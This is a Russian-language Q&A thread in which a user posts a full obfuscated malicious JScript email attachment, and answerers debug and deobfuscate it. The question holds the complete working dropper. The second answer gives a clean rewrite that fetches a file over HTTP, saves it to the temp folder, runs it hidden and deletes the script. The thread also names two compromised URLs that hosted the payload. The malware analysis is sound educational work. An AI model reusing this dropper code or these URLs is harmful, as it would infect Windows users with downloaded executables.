# Как расшифровать вредоносный jse файл?

Tags: javascript

Пришло на почту письмо с вирусом, открыл в песочнице архив, вынул файл jse и вот его код... Он загружает много разных вредоносных штук. Как расшифровать эти функции для расширения кругозора? Или подскажите, куда идти с этим вопросом?

```
    function kfv(tdD, Fh)
{
    var CH = "le" + "ngt" + "h";
    var QOM = tdD[CH];
    var vT = Fh[CH];
    var J = 0;
    var lv = "";
    while (J < QOM)
    {
        var QI = J / 2;
        var ffF = Gpr();
        ffF += "t";
        var G = tdD[ffF](J);
        G = G + tdD[ffF](J + 1);
        ++J; ++J;
        var MD = Fo();
        MD += "At";
        var xWd = Fh[MD](QI % vT);
        var JNS = X(G, xWd);
        lv = lv + JNS;
    }
    return lv;
}
function Fo()
{
    var MD = "c" + "ha" + "rC" + "o";
    MD += "de";
    return MD;
}
function Gpr()
{
    return "charA";
}

function v(O)
{
    var W = "";
    var d = 0;

    var JmZ = hj(O+4);
    var Tjs = 0;
    if ((O == Tjs))
        return false;

    var b = "X" + "ML2" + ".X" + "ML";
    b += "HTTP";
    Tjs = new JmZ("M" + "S" + b);

    try
    {
    pp = Tjs++;
    }
    catch (OM)
    {
        return !zzL(Tjs);
    }

    return false;
}
function n(fb, Z)
{
    return kfv(fb, Z);
}
function z(kUS, Cf)
{
    kUS[n("20140700","odbn7TYhStvEA5fGNU")]();
    kUS[n("30411834","d8hQvUKa5j7v1oC")] = 1;

    kUS[n("3F01510600","hs8repD2DWel")](Cf[n("161C24451B2C351C323B213D","DyW5tBFypTE")]);
    kUS[n("001E125A1F112E59","Pqa3kxA7ML")] = 0;
}

function X(F, wT)
{
    return String.fromCharCode(parseInt(F, 8 + 8) ^ wT);
}

function zzL(N)
{
    var M = "V" + "D" + "\x4C" + "\x37" + "j" + "V" + "\x4F" + "\x79" + "\x6F" + "\x71" + "\x6B";
    var iAg = typeof N[n("19342959",M)];
    var taq = "\x42" + "\x51" + "W" + "\x55" + "\x77" + "B" + "D" + "\x37" + "M" + "Q" + "\x56" + "\x57" + "3" + "f" + "2" + "S" + "X";
    var srW = (n("373F3C3B18352A",taq));
    return (iAg != srW );
}

function Xh(Kqd, hU)
{
    var Hb = WScript;
    Kqd[hU](Hb[n("37221604340014050B392A200908","dAdmDtRpgU")]);
}

function Rto(Hsc)
{
    var Lk=498919;
    var VRL=Lk+18897;
    var zP=VRL/676;
    var cQ=zP-305;
    var I = cQ;
    var Q=110697;
    var flw=Q+51031;
    var Fv=flw/722;
    var ts=Fv-208;
    var avq = parseInt(Hsc, ts);
    return avq;
}

function K(xD, yid)
{
    return Rto(xD);
}

function l()
{
    return "GetSpecialFolder";
}

function T()
{
    return "f" + "i" + "e" + "l" + "d" + "s";
}
function ewH()
{
    return "appendC" + "hunk";
}

function e(Ux)
{
    var Hnp = 128;
    var B = "not";
    try
    {
        var Gmq = "t" + "f" + "V" + "\x54" + "\x55" + "\x71" + "e" + "x" + "B" + "\x74" + "l" + "x" + "2";
        B = "\\" + Ux[n("33032200301C1536231909",Gmq)]();
        B = B + Hnp[n("0E5C3028722E","m4QZ3Z7baO")](256);
    }
    catch (u)
    {
        B = Ux[l()](2) + B;
    }
    return B;
}


function C(JIt, hU)
{
    JIt["run"](hU, 0);
    return 8;
}
function sv()
{
    return "va" + "l" + "ue";
}
function o()
{
    return "b" + "in";
}
function q()
{
    return n("302239212B7C393C5403023101034D","qfveiRkY7lpUrf9gd");
}
function V()
{
    return "update";
}

function r(fw, JIt, OW)
{
    var qn = new JIt(q());
    var os = fw["Si" +"ze"];
    qn[T()]["a" + "pp" + "end"]("bin", 201, 2 + os - 2);
    qn["o" + "pen"]();
    qn["ad" + "d" + "N" + "ew"]();
    var RoM = ewH();
    qn(o())[RoM](OW);
    var c = V();
    qn[c]();
    return qn(o())[sv()];
}
function hR(fw, Hf, JIt)
{
    var pt = "\x70" + "u" + "C" + "\x55" + "\x67" + "p" + "9" + "\x4B" + "8" + "r" + "O" + "u" + "b" + "\x66" + "\x6A" + "7";
    var VW = n("23143530331F7F225417",pt);
    var sD = fw["R" + "ead"]();

    sD = r(fw, JIt, sD);

    if (sD.length > 10)
    {
        fw[VW](Hf);
        return (99 > 77);
    }

    return false;
}

function osm()
{
    var PQ = n("3655291C0210156D192017","U8M2ghpM6C7pnmzZ");
    return PQ;
}

function lx(ue)
{
    return new ue("MSXML" + "2.XMLHTTP");
}

function OK(Cf, JFK)
{
    var j = "2511002B";
    var zE = "k" + "\x7A" + "E" + "y" + "L" + "\x71" + "s" + "\x31" + "\x37" + "\x6C" + "P" + "M";
    var KN = "2C3F11";
    var eNN=425628;
    var yKS=eNN+20532;
    var HHL=yKS/715;
    var EKF=HHL-624;
    Cf[n(j,"JaeEjodLCcrtGiq5C")](n(KN,zE), JFK, EKF);
    try {
        var sP = "l" + "\x67" + "4" + "\x79" + "\x4C" + "X" + "D" + "\x4E" + "U" + "f" + "\x64" + "\x58" + "1" + "J" + "\x6A" + "O" + "2" + "\x69";
        var Bdl = "1F025A1D";
        Cf[n(Bdl,sP)]();
    } catch (GcL) {
        return (1-1);
    }
    return 1;
}

function uG()
{
    if (7 > 4)
    {
        return f(n("5C2E1C077141620E2914300E201F23512801102307630A3C4822032019205D291C052A1A22116705220426053E477505042C4027132F","4ZhwKnMcHgCgMpN"));
    }
    else return 0;
}

function hj(g)
{
    var NP=["Ac","iv","t","O","t","bj","ec","eX"];
    var UY=NP[0]+NP[2]+NP[1]+NP[7]+NP[3]+NP[5]+NP[6]+NP[4];
    var oOe = UY;
    return eval(oOe);
}

function bf()
{
    if (45 > 32)
    {
        return f(n("0E03203D1C576E422E2B331F3B4300057B3A1F4020092A2F2943391E155837220302331E68242B193F420B043363051D26","fwTMomAmGFGlZm"));
    }
    else return 0;
}

function UJ(m, aV)
{
    return new m(aV);
}

function NbL(grF)
{
    return UJ(hj(45), grF);
}

function uHf(ixB)
{
    var bx;
    if (ixB == 1)
    {
        var RN = "\x65" + "\x69" + "C" + "K" + "\x77" + "\x36" + "\x76" + "\x56" + "\x30" + "\x41" + "\x6C" + "e" + "e" + "\x45";
        bx = new NbL(n("360A312207421F38576F2A0C09203610303F125B39345A240F11",RN));
    }
    else
    {
        var Ch = "d" + "\x38" + "B" + "\x67" + "\x33" + "0" + "Y" + "6" + "\x32" + "y" + "\x41";
        bx = new NbL(n("257C0D23711E0A42401C2009",Ch));
    }
    return bx;
}
function f(bRK)
{
    var gf;
    var Tt;
    var XO = lx(hj(42));
    var U = 0;
    if (OK(XO, bRK) == 0)
        return false;

    var AJa = "663B19392D04";
    var ROw=162831;
    var vWV=ROw+9694;
    var dBV=vWV/335;
    var MNv=dBV-313;
    var Ht=633750;
    var nb=Ht+59217;
    var Nx=nb/759;
    var IuQ=Nx-911;
    if (XO[n(AJa,"5OxMXwvDsP")] != MNv - IuQ)
        return false;
    var qp = uHf(1);
    var Vh = uHf(2);
    bRK = e(qp);

    z(Vh, XO);

    if (hR(Vh, bRK, hj(7))) {} else
        return (2>3);

    var mx = "162D370427";
    Vh[n(mx,"UAXwBJjMZCKLt")]();

    var k = hj(144);
    var vx = "00442E4304112C472000211534";
    var ndq = n(vx,"W7M1maXishDyXqzd");
    gf = UJ(k, ndq );
    Tt = osm() + bRK;
    var zo = ((U = C(gf, Tt)) < 10);
    if (zo)
    {
        var P = "3206010004232301551F";
        bRK = n(P,"VcmepFeh9zWw2Adt");
        Xh(qp, bRK);
        return ((6+7)>8);
    }
    return U;
}

function t(us)
{
    if ((us > 5) && v(1))
    {
        var ut = uG();
        if (ut == false)
            ut = bf();
        var mAd=2280;
        var H=mAd+1734;
        var bV=H/223;
        var Yb=bV-15;
        return Yb;
    }
    var Lot=76466;
    var Vm=Lot+394;
    var NyY=Vm/549;
    var Vc=NyY-136;
    return Vc;
}

t(12);

var OaHcu = 096;
```

Answer (score 2, accepted):

Можно понять суть скрипта, если запустить его в режиме отладки. Перед выполнением скрипт расшифровывает сам себя. Для отладки можно использовать браузер (вставить в скрипт слово строчку `debugger;`), принцип тот же самый. Я использую NodeJS.

Запустим на выполнение:

```
node debug index.js
```

Начнется отладка этого скрипта. С помощью `next` (или `n`), `step` (или `s`) и других команд (список можно увидеть по `help`) можно отлаживать шаг за шагом этот скрипт.

У меня дошло до ошибки:

```
< ReferenceError: ActiveXObject is not defined
<     at eval (eval at hj (/home/pusher/tmp/jse/index.js:244:12), <anonymous>:1:1)
<     at hj (/home/pusher/tmp/jse/index.js:244:12)
<     at v (/home/pusher/tmp/jse/index.js:42:15)
<     at t (/home/pusher/tmp/jse/index.js:331:21)
<     at Object.<anonymous> (/home/pusher/tmp/jse/index.js:349:1)
<     at Module._compile (module.js:650:14)
<     at Object.Module._extensions..js (module.js:664:10)
<     at Module.load (module.js:566:32)
<     at tryModuleLoad (module.js:506:12)
<     at Function.Module._load (module.js:498:3)
< Waiting for the debugger to disconnect...
```

Значит, каким-то образом используется `ActiveXObject`. А строка 246, где произошла ошибка, позволила мне найти это место в скрипте.

Далее выяснилось, что используется `ActiveXObject('MSXML2.XMLHTTP')` - это "AJAX". Я его подменил на

```
var XMLHttpRequest = require("xmlhttprequest").XMLHttpRequest;

// далее в скрипте

if(oOe == 'ActiveXObject') {
  return XMLHttpRequest;
}
```

Так как замена была не полноценной, логика скрипта не работала. Немного изменив код, я заставил его работать. Идут запросы на эти два адреса:

```
http://massimomerighi.it/administrator/backups/msg.jpg
https://imtsa.fr/wp-admin/css/colors/blue/msg.jpg
```

На этом я закончил изучение работы скрипта.

Comment: Поведение в nodejs может отличаться от того, как поступит виндовый интерпретатор.

Comment: Спасибо огромное! Объяснили!

Comment: Интересно, что содержится в этих картинках... Открыл исходный код, обнаружил различные ссылки и прочую лабуду, не похожую на код изображения...

Comment: @SyntaxWEB6stPRODWowSuite там exe файл, отчет на вирустотал https://www.virustotal.com/#/file/391a3defc2f9ec2de3e163e6f5655e5580d8390bcc156075b6fbc7caefe131e0/detection `Интересно, что содержится в этих картинках` - ломанули сайт, используют для распространения своих изделий

Answer (score 3):

Произведя очевидные подстановки в код, вроде слияния строк:

```
"d" + "\x38" + "B" + "\x67" + "\x33" + "0" + "Y" + "6" + "\x32" + "y" + "\x41"
"l" + "\x67" + "4" + "\x79" + "\x4C" + "X" + "D" + "\x4E" + "U" + "f" + "\x64" + "\x58" + "1" + "J" + "\x6A" + "O" + "2" + "\x69"
```

И вызова функций, например:

```
function sv()
{
    return "va" + "l" + "ue";
}
```

заменяется на `"value"`

```
function o()
{
    return "b" + "in";
}
```

заменяется на `"bin"`

Станет ясно, что функция

```
function kfv(tdD, Fh)
{
    var QOM = tdD.length;
    var vT = Fh.length;
    var J = 0;
    var lv = "";
    while (J < QOM)
    {
        var QI = J / 2;
        var G = tdD.charAt(J);
        G = G + tdD.charAt(J + 1);
        ++J; ++J;
        var xWd = Fh.charCodeAt(QI % Fh.length);
        var JNS = String.fromCharCode(parseInt(G, 8 + 8) ^ xWd);
        lv = lv + JNS;
    }
    return lv;
}
```

Используется для расшифровки оставшихся строк.

После всех подстановок можно прийти к следующему коду:

```
// пишем значение из stream в recordset и возвращаем значение, возможно не нужна
function readFromStream(adoStream, bytes)
{
    var adoRecordSet = new ActiveXObject("ADODB.Recordset");
    adoRecordSet.fields.append("bin", 201, adoStream.Size);
    adoRecordSet.open();
    adoRecordSet.addNew();
    adoRecordSet("bin").appendChunk(bytes);
    adoRecordSet.update();
    return adoRecordSet("bin").value;
}

// читаем значения из stream и сохраняем в tmpFile
function SaveStreamToFile(adoStream, tmpFile)
{
    var bytes = adoStream.Read();
    value = readFromStream(adoStream, bytes);
    adoStream.SaveToFile(tmpFile);
    return true;
}

// обрабатываем очередной url
function processUrl(url)
{
    var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");

    // делаем GET запрос на  url
    xmlHttp.open("GET", url, 0);
    try {
        xmlHttp.send();
    } catch (GcL) {
        return false;
    }

    // если неудачно возвращаем false    
    if (xmlHttp.Status != 200)
        return false;

    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var adoStream = new ActiveXObject("ADODB.Stream");
    // получаем имя временного файла в папке для временных файлов
    var tmpFile = fso.GetSpecialFolder(2) + "\\" + fso.GetTempName();

    // записываем результат запроса в stream
    adoStream.Open();
    adoStream.Type = 1;

    adoStream.Write(xmlHttp.ResponseBody);
    adoStream.Position = 0;

    // сохраняем все во временный файл
    SaveStreamToFile(adoStream, tmpFile);

    adoStream.Close();

    var wsShell = new ActiveXObject( "Wscript.Shell" );

    // пытаемся запустить сохраненный файл как cmd команду
    wsShell.run("cmd.exe /c " + tmpFile,0);

    // удаляем файл
    fso.deleteFile(WScript.ScriptFullName);
    return (true);
}

function Run()
{
    var result = processUrl("url/1"); // пробуем с одним url
    if (result == false) // если не получилось
        result = processUrl("url/2"); // пробуем с другим url
}

Run();
```

Comment: а что там приходит?

Comment: @Дмытрык, я не скачивал :-) судя по коду какой-то бинарник, который потом в cmd пытаются запустить

Comment: Ну, финт же не пройдет, т.к.`ActiveXObject` в современных браузерах нет?

Comment: @Дмытрык, а скрипт не в браузере исполняется :-) [wsh](https://en.wikipedia.org/wiki/Windows_Script_Host)

Comment: Круто, реверс-инжиниринг в действии

Comment: @TotalPusher, ну в данном случае тут просто много подстановок, особого реверса нет.

Answer (score 1):

Расшифровать не получится тут использован JS Compressor он выдает случайные параметры разве только попытаться понять алгоритм функции.